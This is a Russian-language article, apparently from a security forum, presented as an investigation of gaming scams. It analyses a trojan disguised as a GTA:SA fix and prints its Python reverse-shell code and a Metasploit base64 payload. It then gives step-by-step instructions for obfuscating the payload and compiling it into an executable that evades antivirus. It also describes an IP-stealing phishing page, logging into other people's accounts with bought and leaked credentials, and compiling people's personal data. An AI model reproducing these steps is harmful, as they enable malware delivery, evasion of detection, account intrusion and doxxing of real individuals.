По горячим следам: расследуем мошеннические схемы - Undetected Handler и барыга-идиот
Статья будет достаточно тяжелой, поэтому юморим сначала.
А перед прочтением сего материала советую ознакомиться с первой частью.
Салам. Я опять понятия не имею, как можно начать материал этой тематики, поэтому просто поздороваюсь и перейдем к сути. Происшествие с угоном моей родненькой CS 1.6 действительно дало мне кучу идей для написания текста. В этой заметке вы опять не увидите от меня сюжета, простите, кто ждет продолжения какой-либо из цепочек, но мне понравилось быть в роли жертвы с последующим оборотом в следователя. Это увлекательно.
Дошло к тому, что у себя на странице в ВК я запостил это:
Откликнулось действительно много народа, правда ничего стоящего выловить не удалось: это либо самые примитивные схемы, либо уже известные долгие годы, работающие лишь… Я не знаю на ком такое должно работать, ладно, упустим. Среди всего хлама выделю следующий, уникальнейший способ, он насколько продуман и идеален, что точно сработает в 10 из 10 случаев. Я опять повелся! И сие чудо, кое было сгенерировано человеком с абсолютным умом и заоблачным IQ, выглядит так:
Я не мог не повестись на такое… Это абсолютный способ. Знаете, какие меры были предприняты мной? Верно! Я сфоткал ему свою карту и отправил.
Благо в моем распоряжении имеется добрый десяток банковских карт, не принадлежащих мне, поэтому сфотографировав одну с них, я решил упасть на мороз, сказав, что я из Украины и у меня не работает выгрузка изображений. Вообще это изначально должно быть просто шуткой, которая разбавляет атмосферу перед действительно серьёзной частью, но давайте используем наши мастерские умения пользования платформой Github, чуть-чуть порезвимся.
Если мы вспомним прошлую заметку, то там моим проколом было, что я попался на хорошо сделанный фейк, да, и такое случается. Там было детально разъяснено почему и как, применим теперь эти знания на практике.
Для начала выгрузим фотографии карты на простенький файлообменник, перейдем в Кали и попытаемся скопировать данный ресурс посредством Wget:
Код:
wget https://prntscr.com -nc -l 1 -k -EИ вот опять лайтшот, ну, здесь уже отсылочка для очень старых читателей, выбран он был не случайно, ведь по статистике, невзирая на кучу предостережений о том насколько эта штука небезопасная, люди продолжают ей пользоваться активно.
И что же мы будем делать дальше, спросите вы? Воровать аккаунты Лайтшот? Нет, меня интересует чуть-чуть другое. Когда-то с вами мы рассматривали репозиторий, который позволял получить информацию об устройстве и его пользователе, когда тот переходит по нашей ссылке, некий стиллер айпи и прочей информации.
Если подумать, то работал он как переадресовщик со всплывающим окном на несколько секунд “No internet”, точнее мы его превратили в такое путем нехитрой вырезки и вставки кода. Теперь у меня появилась идея просто вшить этот скрипт в наш фейк.
Пожалуй установим:
Код:
git clone https://github.com/Bl1xY/CookieCatch.git
cd CookieCatchИ тут мы столкнулись с проблемой, которой я так боялся. Дело в том, что автор скрипта изменил концепт его работы и теперь в репозитории лежит лишь .php. Думал я не долго и решил просто попытаться преобразовать или php в html, или наоборот. Первый вариант оказался проще в разы, поэтому закидаем наш скрипт в код страницы, сохраняем и идем искать хостинг.
Следуя прошлым объяснениям делаем всё максимально похожим, заменяя лишь один незаметный символ, получаем следующее:
Ссылка скрыта от гостей
.Теперь давайте закинем эту ссылочку нашему “обманщику”, который так-то плохого ничего не сделал. После того, как он перешел по ссылке, мы получили следующие данные:
Он пользуется седьмым андроидом, проживает где-то в Самарской области и самое главное - его айпи. Дальше уже можно будет пробить через тот же Глаз бога, поискать в Мальтего или просто проверить открытые порты. Свобода действий в общем.
Такой вот вышел небольшой стеб, а теперь пора переходить к вещам более серьезным
На самом деле я против зла и то, что я покажу вам далее, может быть, практически применено различного рода антагонистами. Сразу предупреждаю, что я, как автор этой писанины , снимаю с себя ответственность за то с каким умыслом будет использована эта информация дальше. Виноват только и только тот, кто применяет знания, но не тот, кто ими делится. Автор лишь преследует благие цели, используя способы и пути злоумышленников, раскрывает суть преступного механизма, открывая людям глаза, демонстрируя способы защиты, ведь лучший протект - это знания.
Помните, прошлый раз я заикнулся о том, что некоторые статьи тематики “Проблема - ответ” имеют в себе не только желание помочь, но и своровать несколько сотен с вашей карты. Подобным образом злодейка из прошлой статьи создал целый ботнет в дискорд по рассылке фишинговых текстов.
А ведь он мог начать мыслить куда глобальней и заработать не те несчастные копейки с перепродажи ворованных аккаунтов, а целое состояние. Но у каждого свой путь.
Кстати, я не забыл о прошлом деле и не спустил его на тормоза, просто этот парнишка решил затихнуть, а мне приходится ждать действий от него, может оступится ещё.
Специально для сегодняшнего расследования мне удалось разыскать пользовательскую статью на очень крупном тематическом портале по очень старенькой игрушке - GTA:SA. В этой мошеннической писанине человек предлагал исправление вылетов и несовместимостей, забавен факт - это действительно было рабочим методом. Обратил моё внимание на это творение один мой хороший знакомый и заседатель нашего форума, за что ему я очень благодарен.
Итак, для начала проведем анализ текста, стоит отметить, что он действительно оригинальный и нигде больше замечен не был. Написан он просто, очень доходчиво и прям всё по полочкам, что автоматически располагает вас к автору. Также он использует обороты “Сам долгое время искал решение”, “Потратил несколько часов, но ничего не получилось”, что на подсознательном уровне приравнивает читателя к автору, мол смотри, я такой же как и ты. Один из ключевых факторов установления доверия - равенство. Сразу в глаза бросается грамотность, нет практически никаких ошибок: грамматика, пунктуация - уровень. Можно подумать, что это действительно человек, имеющий опыт, он взрослый и чётко понимает своё дело.
И здесь важно заметить, что если бы автор прикинулся дурачком, процент успеха был бы меньше. Хотя когда жертва видит криво составленный текст, отсутствие пунктуации автоматом срабатывает шаблон: он дурачок и ничего плохого не сделает точно, ему можно верить, ведь способ действительно хорош. Но в сфере пользовательских писанин всё же преобладают по доверию умные, сдержанные и вежливые авторы.
Итак, давайте перейдем непосредственно к анализу нашего вредоноса. Имеем мы некий gta_sa.exe, который абсолютно чист и в архиве с ним вместе compatibility_fix.exe. Казалось бы, что в них не так? Прошел ровно год с момента публикации и он не палится на ни одним антивирусом, да и комментариев о том, что после скачивания данного архива произошло заражения нет. Интересно.
Положив под лупу основной файл, а именно exe самой игры, ничего такого не удалось обнаружить. Даже распаковав тот и проведя небольшой анализ кода - чисто. Второй файл уже представляет собой что-то. Просто посмотрев на иконку, сразу же вспомнилось, как когда-то я компилировал скрипты на питоне в .exe.
Да, когда-то у меня были попытки кодить что-то, это был блэкджек, но всё же. Иконка стандартная для выхода с auto-py-to-exe (дальше он нам понадобится), её даже не удосужились сменить. Работает ли это? Определенно.
Раз это собрали, его можно и разобрать. Сейчас я покажу достаточно хреновенький метод, и явно существуют лучше, но мне нравится и так. Работать почему-то захотелось мне с Винды, открываем Повершелл, прежде скачав скрипт-декомпилятор(ссылочку оставлю внизу). Установим библиотеку
Ссылка скрыта от гостей
:
Код:
pip install uncompyle6И посредством экстрактора извлекаем с .exe файлы .pyc & .pyz:
Код:
python pyinstxtractor.py 1.exeПосле в директории будет создана папка, в которой будут лежать файлы с исполняемого. Честно, можно было бы ещё и декомпилировать, как я хотел сначала, но потом решил просто установить расширение .py на единственный файл без него и получил набор иероглифов в вордпаде, но самое интересное, что там был и айпи. После расшифровки мне удалось лицезреть очень знакомый скрипт, ну очень знакомый..
На этот моменте шлю привет автору этого хандлера на Питоне, чью полезную нагрузку мы смогли задетектить. @Proxy_ninja. Да, эта штука была написана специально для Codeby и оригинал имеет такой вид:
Код:
import socket
LHOST: str = "192.168.56.102"
LPORT: int = 4545
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((LHOST, LPORT))
exec(s.recv(4096).decode(encoding='utf-8'))Кстати статью этого автора редактировал я.
Злоумышленник явно мог более качественно замаскировать это дело, а не… Да, этот код обфусцирован с помощью pyminifier, кстати вот как это делать:
Код:
pip3 install pyminifier
pyminifier script.pyДаже стандартный пэйлоад с Метасплоита шифрует ваш айпи в base64, имея таков вид:
Код:
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNy4wLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9')Хотя расшифровать это можно просто подобным скриптом, с последующим запуском:
Код:
import base64
text = 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNy4wLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9'
decode_text = base64.b64decode(text)
print(decode_text.decode(encoding='utf-8'Проверив спаленный айпи с помощью nmap, оказалось, что он не в сети. Скорее всего это был выделенный сервер, где был запущен сам хендлер, может быть данной машины уже даже не существует.
Теперь давайте вникнем, как же преступник делал всё это. Представим, что сначала мы создали статью с благих побуждений, поделились мы информацией с общественностью, начали получать положительные отзывы и рост форумной репутации на лицо. Но вдруг нарыли туториал на каком-то портале, в нашем случае это форум Codeby, где велась речь о создании хендлера, который никак не светится и стопроцентно выдает вам командный shell без зависимости от операционной системы.
И здесь у вас в голове начинает бурлить идея, вы сразу видите тонны золота у себя в подвале и дорогой спорткар у двери, а простенькая квартирка превращается в виллу. Теперь у вас есть цель - превратить статью, которую ранее вы направили на благие цели, в нелегальный бизнес. Ведь имея удаленный шелл на машину можно закинуть что угодно - будто уже более продвинутый троян или простой майнер.
К слову о майнерах, недавно попался на сборку винды, где по дефолту вшит майнер, который делает свое дело тихо и лишь иногда заметно сжирает производительность. Скоро будет материал и по этому.
Для начала мы качаем архив, который Proxy_Ninja оставил специально для нас, отказавшись от ответственности. Здесь мы наблюдаем три файла: генератор, полезную нагрузку и сам сервер. Запустив генератор, получаем обновленную полезную нагрузку. Ну и ладно.
Переходим на Кали. Для начала давайте отредактируем server.py, указав айпи нашей машины и порт, на котором сервер будет запущен.
Следом редактируем payload, также заменив IP и порт на свой. Здесь я решил чуть-чуть пойти другим путем. Для начала обфусцируем код, хотя это не обязательно, он не палится в обоих вариантах:
Код:
pyminifier payload.pyА затем возьмем исходную структуру с полезной нагрузки Метасплоита, то есть всё кроме самого base64, после превратим тело полезной нагрузки в Base и вставим.
Да, вариант шифровки не идеален, но от простых исследователей уже защитит.
Теперь давайте всё это превратим в исполняемый файл. Здесь уже понадобится Виндоус, хотя и с Кали это возможно. Покидаем полезную нагрузку и открываем терминал повершелл. На вашей машине должен стоять Питон, дабы у вас это вышло. Логично, да?
Небольшая вставочка, также мы обфусцировали код, который сервер будет передавать пейлоаду и чуть-чуть изменили его структуру. (Вставочка после публикации).
Кстати, здесь я и провел первый тест, просто запустив скрипт. Открылся шелл на Кали, Виндоус 10 с Авастом (вот его специально поставил), ничего не противопоставили.
Установим компилятор следующей командой, а после и запустим:
Код:
pip install auto-py-to-exe
auto-py-to-exe.exeОткроется у нас такое GUI окошко, где нужно будет выбрать исходный скрипт и нажать одну клавишу. После в директории .../output мы получим файл.ехе.
Запустив тот - получили шелл на Кали, второй тест успешен. Кстати, процент обнаружения всё также 0 из 70. Ну и всё. Остается лишь распространить. (Шучу)
Слегка другой раздел: отслеживаем барыг
И не дает мне покоя одно дельце, все мы помним, как в прошлой статье мы связались с человеком, который продавал мой аккаунт на бирже игровых ценностей. Продавец был явно не того состава разума, чтобы провернуть столь огромное дело. Поэтому мы сошлись на том, что это просто посредник в продаже, это как “Дропы” в кардинге. Расходный материал.
Поэтому меня очень заинтересовала перспектива связаться с каким-то барыгой, который явно промышляет воровством, и попытаться отследить того, естественно используя лишь легальные методы.
Спустя несколько минуток поисков, удается найти человека, имеющего на данный в момент 9 активных предложений по продаже разнообразный аккаунтов: Стим, Оригин, аккаунты игр. Есть всё и это все явно не может быть его. Ибо в сумме число наигранных часов превышает возраст среднестатистического любителя Бравл Старс нынче. Также на сайте он зарегистрирован не такой уж и продолжительный срок. Поэтому давайте свяжемся с ним и попытаемся что-то купить.
Будем мы совершать некий обход, сначала попытаемся закосить под полоумного дурачка и скинуть ему ссылку на наш поддельный файлообменник, который ворует чуть-чуть данных. А потом уже с другого аккаунта просто купим у него какой-то товар, дабы получить его почту и пример пароля. Вероятность одинаковых ключевых слов низка, но все же она есть. Говорю, как человек, который трижды в своей жизни что-то покупал и трижды получал несанкционированный доступ к имейлу так.
Итак, после покупки данный персонаж кидает нам авторизационные данные в сервисе, что делаем мы? Верно, ищем по домену сервис, который предоставляет услуги мейлбокса, проводим авторизацию и быстро меняем пароль. Попутно нам удаётся найти следующие данные: Номер телефона польского владельца (что сразу дает понять, что аккаунт ворованный), резервный почтовый адрес злоумышленника и его айпи адрес в сессиях. Кстати, я пожалел, что не учил польский и что не поехал на семестр от универа туда, когда мне предлагали. Вот вам наглядный пример, как общество на подсознательном уровне относится к тем, кто выглядит словно дурень:
Продавец подумал, что я, будучи каким-то мелким школотроном, не могу обмануть его, поэтому сам возвратил средства и закрыл сделку. Такая вот психология вида идиота. Пользуйтесь. А да, точно! Мы же только что раскрыли ещё одну схему обмана. Если бы не вернул средства продавец - возвратила бы их администрация. Фактически мы получили халявный аккаунт.
О владельце почты можем сказать практически всё: От его имени, которое я не буду называть, до того, что у него автомобиль Хонда 2007 года с номерами ***, он постоянный клиент сексшопа, который сделал для него специальную рассылку. Мы знаем номера его кредитных карт. А ещё этот человек фанат шахмат и бравл старса, у нас есть доступ к его дискорду, аккаунту на ютуб, а стало быть ещё и интересов, ведь анализируя рекомендации и историю можно пробраться человеку в голову. Кстати, здесь ещё и подписка на спотифай имеется. Только позже оказалось, что у него есть аккаунт в Стиме, где инвентарь на несколько тысяч долларов. Но нас это мало интересует и почту мы вернем истинному владельцу.
Теперь о истинном воре давайте поговорим. У нас есть одна из его почт, она имеет свежую регистрацию и привязку к телефону. Сначала пробив почту по поисковым системам - ничего не удалось обнаружить. Переходим в сам Мэйл.ру, где создаем письмо, неважно с каким текстом, отправляем то, а после и получаем возможность просмотреть профиль, где ничего особого не указано.
Поиск по никнейму тоже не дал результатов. Но тут я вспомнил, что у нас есть его IP.
Проверив через nmap, можем предположить, что это действительно его адрес, а не ещё один VPNщик, открытые порты имеются. Теперь воспользуемся сервисом, который предоставляет услуги проверки на “слитые” пароли. Ссылку на него не оставлю, ибо он чертовски дорогой.
Не поверите, но пароль-то узнать удалось и на моё удивление он подошел. Как что-то типа такого “UtYEtMyaj4*1” можно было слить, я не понял, но суть остается сутью.
Попав в аккаунт нашего злоумышленника, нужно действовать быстро, по идее обычно приходит уведомление о логировании с незнакомого айпи. Делаем кстати всё это с ВПН. Здесь нет ничего особенного, кроме одного письма, письма от Getcontact, где указан номер этого “Владимировича2002”, только я успел вбить номер в поисковик - сессия была прекращена и владелец сменил пароль. Ну и черт с тобой.
Теперь у нас есть его айпи, почта и номер телефона, хотя почта далеко не основная. Этот персонаж владеет целой цепочкой связанных между собой адресов, отследить всех - практически нереально.
На этом моменте мы уже могли включить стресс тест на айпи адрес вора, но так делать не станем, ибо меня интересует сугубо информация, а не противозаконные манипуляции, хотя и так мои действия не назвать чистыми. Имея номер телефона, давайте-ка узнаем имя нашего преступника, а может быть и место жительства.
Что мы можем сделать, имея лишь номер телефона? Конечно, заказать пробив у оператора за 500 рублей. Но здесь велика вероятность просто отправить деньги в пустое место, а взамен ничего не получить. Поэтому сейчас я покажу вам, как легальными способами можно узнать владельца номерочка.
Для начала, давайте забьем эти циферки в разные поисковики, как с приставкой 8, так и +7. Гугл, как всегда ничего не показывает, а вот Яндекс выдал нам ссылку на объявление по продаже автомобиля на Авито.
Смешно, теперь мы можем предположить, что данный персонаж живёт в Подмосковье и зовут его Владислав.
Следующим шагом давайте проверим наличие привязки к мессенджерам. Ну здесь уже путем банального добавления в контакты или добавления контакта через этот же мессенджер. Оказалось, что персона сия имеет Вайбер и Телеграмм, в котором мы смогли запалить его лицо на фоне унитаза в клубе. Смешно. А теперь давайте проверим наличие привязки к Инстаграмм, для этого возьмем чистый телефон с чистой адресной книгой и добавим Владика в неё, создав новый аккаунт - смотрим рекомендации. Скорее всего, если этот номер привязан к этой социальной сети, то мы получим профиль. Также можно будет запустить проверку по юзернейму с телеграмма, которая , может быть, выдаст ещё несколько аккаунтов с таким именем.
Выводы, словно итоги
Давно я не писал столь большого объема текста за день. Для вашего понимания картины всей, сейчас уже вечер субботы, начал я писать с утра. Практически не отрываясь от дела, удалось нашкрябать такой вот материальчик. Надеюсь, что вы смогли почерпнуть чего-то новенького и полезного.
Кстати, идея с фейком на Фанпее, который ворует IP, провалилась, ибо сам сайт запрещает ссылки на другие ресурсы.
К первому разделу, где мы анализировали вредонос из пользовательской статьи по GTA:SA, добавить, в принципе, то и нечего. Обнаружить творение нашего коллеги по цеху достаточно просто, хоть оно и не индексируется ни одним из существующих антивирусных ПО. Висящая вкладка Python в диспетчере задач - плохая весточка, даже если у вас установлен этот же питон. Также анализом трафика можно попытаться обнаружить, об этом нужно будет поговорить чуточку позже. Как раз в статье, где мы будем разбирать вшитый майнер. Там это будет очень актуальным.
Методы угона аккаунтов второго мошенника мы разобрать не смогли, ибо просто пытались обнаружить его, имея для этого определенные данные, которые были засвечены самим же продавцом.
Польский аккаунт был возвращен истинному владельцу, никто не пострадал вроде как. Я постарался сделать максимально правильно и честно. Правильно или нет - понятия не имею. Владик, а тебе я шлю привет, если ты это читаешь. Не воруй лучше у других, ну или хотя бы маскируйся тщательней.
Нынче люди раскидаются номером телефона повсюду, а ведь зная ваш номер, можно узнать даже ваше местоположение. У преимущественного большинства жителей стран СНГ, номер можно купить лишь по привязке к паспорту. Это вам ничего не говорит? Бдительность - человека красит.
А на этом у меня всё, вынужден отойти к Морфею. Бывайте здоровы и не попадайтесь на уловки негодяев.
